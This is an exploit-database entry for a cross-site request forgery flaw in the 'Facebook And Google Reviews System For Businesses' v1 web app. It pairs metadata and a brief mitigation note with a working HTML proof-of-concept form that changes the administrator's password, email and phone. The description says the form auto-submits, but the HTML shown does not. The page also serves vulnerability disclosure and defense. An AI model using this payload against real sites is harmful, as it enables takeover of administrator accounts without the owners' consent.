header-logo
Suggest Exploit
vendor:
Facebook And Google Reviews System For Businesses
by:
Veyselxan
8.8
CVSS
HIGH
Cross-Site Request Forgery
352
CWE
Product Name: Facebook And Google Reviews System For Businesses
Affected Version From: v1
Affected Version To: v1
Patch Exists: NO
Related CWE: N/A
CPE: 22793559
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
2018

Facebook And Google Reviews System For Businesses – Cross-Site Request Forgery

An attacker can exploit this vulnerability by crafting a malicious HTML page that contains a form with pre-filled values. When the victim visits the malicious page, the form will be automatically submitted and the attacker can change the password of the admin user.

Mitigation:

The application should verify that the request is coming from an authenticated user and not from an attacker. The application should also use a random token in the form to prevent CSRF attacks.
Source

Exploit-DB raw data:

# Exploit Title:  Facebook And Google Reviews System For Businesses -  Cross-Site Request Forgery
# Date: 2018-12-13
# Exploit Author: Veyselxan
# Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559?s_rank=38
# Version: v1 (REQUIRED)
# Tested on: Linux

# 1 Poof Of Concept (Change password):
<html>
   <body>
      <form action="http://Target/action.php?action=profile" method="post" class="form-horizontal form-bordered">
         <input class="form-control" name="name" value="Admin" type="text">
         <input class="form-control" name="email" value="admin@ranksol.com" type="text">
         <input class="form-control" name="password" value="password" type="text">
         <input class="form-control" name="phone" value="+18323041166" type="text">
         <input type="hidden" name="id" value="1">
         <button type="submit" name="submit" value="submit" class="btn btn-fill btn-success "><span class="ace-icon fa fa-save bigger-120"></span>Save</button>
      </form>
   </body>
</html>

Navigation

Suggest Exploit

Services By CQR